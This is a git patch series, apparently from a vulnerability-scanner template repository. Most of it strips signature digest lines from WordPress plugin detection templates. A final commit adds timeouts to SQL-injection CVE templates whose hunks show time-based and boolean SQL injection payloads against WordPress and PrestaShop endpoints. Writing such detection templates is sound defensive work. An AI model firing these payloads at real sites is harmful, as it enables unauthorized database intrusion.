b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c7724af344ef313dfd853c0add53de47d64a110257ef26aa904b77d7ed4eb28022100fca180f3f3bfc96dcfb36a18ee0b10f09d495dde05f5b330aa3287a38420e876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 1388ec0a24..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ea8305e2f8088bf2eb2616d410dd2a07b0bbcf0d92e4af0fcda61ac0d84a88f0220302a87a9995f3f093f417e007359406a1f9694a48c7ea1f1ffbd7c5bbf5255da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 8e1b5b8395..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207828d25da3b662d2bdd001c5c6eab7f2228161510ef9a8c2c0fadd33446c8c95022100c151f440c3f8955b9df57c37ef535bcbb2c08009c99e7ce2682b396a0e46b767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index ad8fca8c58..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220458f3d74acf8569f5ea62ebad483731c84881ec224a61bbf10c3f37dca745bad022100d7b640b481483478635798ebbd4651d1db37171c5a270e7aad7fee420631cba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index b9fa856a93..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fccf514ace8f19f8618279877c712074b727378e03ee7ede3e9d7344386c8ec902207b0a716d7e832938fd63b12ce75442c0d9820a8c30addf76b9ac02bcf5159b05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index d07f0b0f10..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220683c6d327b0e76286c2322c75799ad179566d2db89dcd06b177c23df9ef2c5cc022100d4be071ce8f163412bae30785c9813895496d68f999c1a9dc815fbbbef873800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 489709e071..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c75945762e90ce4cc198090d5706fef2c6bca1c1f92fab06e8cdf03079c7a02b022100a101f795d6684f236c1151d557fc9442ede1adad5823582f46e4106a7e9ac21e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index e1cfae6643..a4c9f2c7c4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e784f4c0b94bd9bf06dbf21909972d647a9d5d39c4ffbbc251ee7da6cc4fbde8022100c40478d6cdc84c02bcbcca373a9b12b92354aec506432827510e58a0794dd045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 01ac550264..1fd49d2e08 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c81a6a4041c6f52c8e7b242f2d2b3bc29740c8b96169fb1778d6f725e59441e8022029601dc7c2337fa64f9ec740d1a5eca167e95586317ece802d6de4155aaa2ac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 719f115a98..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e3f47b79e5e8457715f49c6c19d886b167e34f57fd417a60041bcfbb89289c7e022100ff46c42d6f7c2903bb7ad045679bbb9f85683ade013aaf37c6f3bed431e39286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 51803727e9..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a3d69456b281b4766bc6e89be287f21d09fa4067a45ac82d797869270150297d022013b80e4c84aad9c7dedb9c3ea7e3d35dc6a9f568eda44a8c4568c490a5d11051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index f328671fd1..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f76a8c7d7cddd9079d6c33fbfd7890330c351064287ab935efa82e6ec45df49502202cfbf6a14e8da9c427713c7c46618ab9df8c5767b25fe2c824223c30ce315b46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 4fe54a9159..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aabe829f1c793abc7048cd7fd9bb60d4af711c803c60e576e5d7fec9cbf42c4a022100ce37827bafd43d16e9ba82530d030bb6a853a38d723d764dc48757a11b274b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 3998a1448c..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cce31871944c2a09a42e933d8f17c1153fb9b529008306e1888ec5f4d7fe74f902202b6e15fd9c416fb9b86220c5c875eaf56e3f447d96a7d45bb36991d2a24b68c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 218d32931b..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa2a7f20bf684665c59ccd5d2dd309421cabf4bb89aa3a35b2f7d58510f5c3300220425779d68820f2cc71340ac43c1480f7c43fc7064abf0fac464c3fa2f79d5299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index dd5789f9b6..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c797e771d78c8ddbd5b86430222831f65b95379c880434bbe23463420dab442002210087fd0452f79130e3ce3f8c5dc4acbd88f2f6403bbe8e6a695ce02f2244412605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 4b03f9cf12..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f708730adf06bd9482f68ce7b7b2dfc5b04d1e308f3c38cbbb5e352ccdd68ebd02202974cc90403343e46c15fb2eef06584ee13403e0a93c05675f805ea1c144ab27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 63ec3c022c..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a2e5dba6155faae0d6d3fa14d6353c7d02b2f07054c84fd3aa252ff92bace472022100f4f32d5de16ba3d373ae89eb4a2ef49176b1c95ee3e8feb324df558877aaa697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 8d2f32573c..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008186f4b48015b1e59dbac92f26205f27376a882ffb0b8d04d5a2e476f411518c022100ad1e34b664a31945079853d77245ab5d0c507264859420562941cecd4f156979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index c8357733e0..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e29486bfb823d538bd1179eb54c61fb9b29c46f2034a78358617c36488b27090220359a3eae0eed9b235a0dbf3eece7ec4b3828e4e1bb73925f62b389ad08d7f384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 610aebb25e..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ffef42df7f37c967c59bec36ffb83a430ea63d1dced5babb1a3d63c9c1ef10f022100d9f0fd23493179b2804095af2ca4814b863edb74218d0800e2f4d3490376102a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index b04b9dac0d..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e5ab215c834a30e1e3cbfffe9276bc4b46fc4346e2e8e091fa074d04ae56800022100f0f3583f479d144d77deed592e00015e2297957ea689816ac4013f2888a2aa0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 424331e692..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100af0052e23254ca9f0d1eaf1b9a30f79926b861d83d01e3a07513b536624e4c55022100c1d625ef985026ad26f14dd8a401ed007820cfe8970144c7d60602f536ea20dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 785c074593..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f013742203999f39e5fddc6c61535674a00eb805d263e47425c3de330f32dae02210088eb790c5b73c06a610df191d379f7580ba36c249dee4e5e22da5953544efe21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index f35ea85642..34115bcd0f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057ea6155212f2c53b6456a4ca8c1c16115f95661ff53a26e831dde6709c5608b02207c218c64d8ece5a6b2f7afb748fcbd3aedbd5318861122249be076921bfad4b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 0f54411484..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df4a0ce9e053c04794a5ef290e7b9b439b90db70255acabc275e9fc2d4c53bd102207d2b885e18b1e8147db9a5ab30dbc86445b9f4e090c9a88c60273b9e61995840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index ba59650889..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d5a14dad781a31b4d17f757d96634a22419d93fc8ad7e5be47ce106e01be05002210084d7c01061afecf73d48fa33ce2c91b143d24bd6c7807e3efd89ac1b33fc3f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 1162e2ecc1..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e41e3d6d390dd74a8b2302a9c516babe93a4fcb1cbfaf8d62e0955a9a9967ce02201b15617ace8ab1f4b9b89cc45767bc7a200d11c2916a542a68e33fd7cdfc7fff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 7ac9bf5310..c3ec4ebd80 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220109c2787153f6fde41753e83870d23f8928a932f49ad3616183ccf7bae61be660221008254147766a25385b2cf16ac472d3102e1a87f69d71c25f01efa77c26e32904b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index f45940044f..2276545093 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2679103f12c5195888460d5601e20131a76b913b3b5532e2d43b9be733032b8022100908072c4528bcf458104764c42a66445d367e098ace569b7bd4c0bde2b950271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 5026f17708..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d881b1ad00dbb77fd45bb72840484cf19010b5b45d3978299094294c24750bf902200eb298ec7326a86e529115b07a7925aef4366dfbc7adbe5918df4730addeff00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8937d80534..7b28bf7020 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047e53689dcd8d1e2a5a7504a89b109e666ca9245288d1d7e18dd6ac81656328402204e35f472ff3fe704998274f965edad632258d3fa0eb30e2002ca4640039c26fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 9ba3f5cf2a..da6abc2a81 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d78a1a21573d405bdd8f4b21242c811fc2eb8f22f3d5246e7ce9290508ae5a602201cf1dfdcc98a8f35a10545d270d0df2250b06a73a5310f9851e8bbb7945436e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 7f542d3108..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008d8a80f047a4f06fa4ee6d5b1977597a5bc9a12f1d35a570fa6ea34764b794e4022062ee1198240932f62d94af38f6db68333f262cb2746e64df0cbca45b347bce6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index b3f1723b08..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013d96e845d891ad070f6641163fc3f56cfe50d6f4746c6beb4b98b4a27849a0802202fef6a4759872ae603c14979fae1f53427f838a3a92eb4135cd78aed0d4019a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index aaf146d753..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204eab91b8e139244cd5ec1e7cdc5ce551807b9d3178a4aa54473766a5aacf7c15022100ad2d401aa5fe51315eeca203bb200264d9a6fd176a169bf6cbb55833d13fb959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 0cd256279b..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220481c6d08e81ba639311ef081c10abdb3d7a40e104145feb8d374f6df6c7943ef02203e670dc65b6b5dafc8bb7215a6cb3346b60bdaccb08742cdf4329e33aaa78736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 12ec187fa1..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220186ca11cbcd320703cd0bf3168cb29bbdcd17f8caf43f5923e40698bcd27650e022011fd48560e62b7cbe218d47ae597b3bdd1988f57c63524582b2d9addc5c17f7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f6b6ea26ff..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df99f34a54a4c72f041d85a4f481b01103d7ce41a57567f92589521ba8f76829022042a1475bfe4c4bbd3e05ae2a2deb50475a47c2907844a3d4bb7825791f38680d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 2bf25504ca..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca0acdc11506e356cf7488278b9ee2554c28405e5d8c93a2cf440294785d554a0220230f0021e464a32be53525f5499dcd3a12060c7000f02ec727966914f22571b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 02fb739d0a504a3421326bc99d30cf78236b6c4e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 23 Jun 2024 00:21:12 +0000 Subject: [PATCH 0505/1841] Auto WordPress Plugins Update [Sun Jun 23 00:21:12 UTC 2024] :robot: --- helpers/wordpress/plugins/google-sitemap-generator.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/google-sitemap-generator.txt b/helpers/wordpress/plugins/google-sitemap-generator.txt index 7f76021554..959b4621f9 100644 --- a/helpers/wordpress/plugins/google-sitemap-generator.txt +++ b/helpers/wordpress/plugins/google-sitemap-generator.txt @@ -1 +1 @@ -4.1.20 \ No newline at end of file +4.1.21 \ No newline at end of file From 1c64701b766ea144a2cf285aff716c8d324d8831 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 22 Jun 2024 22:19:02 -0700 Subject: [PATCH 0506/1841] updated sqli templates with increased timeout --- http/cves/2015/CVE-2015-4062.yaml | 1 + http/cves/2022/CVE-2022-22897.yaml | 3 +++ http/cves/2022/CVE-2022-4049.yaml | 1 + http/cves/2023/CVE-2023-0630.yaml | 1 + http/cves/2023/CVE-2023-28662.yaml | 1 + http/cves/2023/CVE-2023-30150.yaml | 1 + http/cves/2023/CVE-2023-39796.yaml | 1 + http/cves/2023/CVE-2023-43374.yaml | 1 + http/vulnerabilities/other/erensoft-sqli.yaml | 1 + .../prestashop/prestashop-apmarketplace-sqli.yaml | 1 + http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml | 3 ++- 11 files changed, 14 insertions(+), 1 deletion(-) diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 76052a00b2..eaeabdda5e 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -41,6 +41,7 @@ http: log={{username}}&pwd={{password}}&wp-submit=Log+In - | + @timeout: 20s GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 7788fd4c4f..19635ee5d3 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -39,6 +39,7 @@ http: GET /modules/appagebuilder/config.xml HTTP/1.1 Host: {{Hostname}} - | + @timeout: 20s POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -47,6 +48,7 @@ http: leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0) - | + @timeout: 20s POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -55,6 +57,7 @@ http: leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI - | + @timeout: 20s POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index cc8f933197..d3d883709f 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -36,6 +36,7 @@ http: GET {{path}} HTTP/1.1 Host: {{Hostname}} - | + @timeout: 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 3299a170aa..64fa55a26b 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -40,6 +40,7 @@ http: log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | + @timeout: 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} 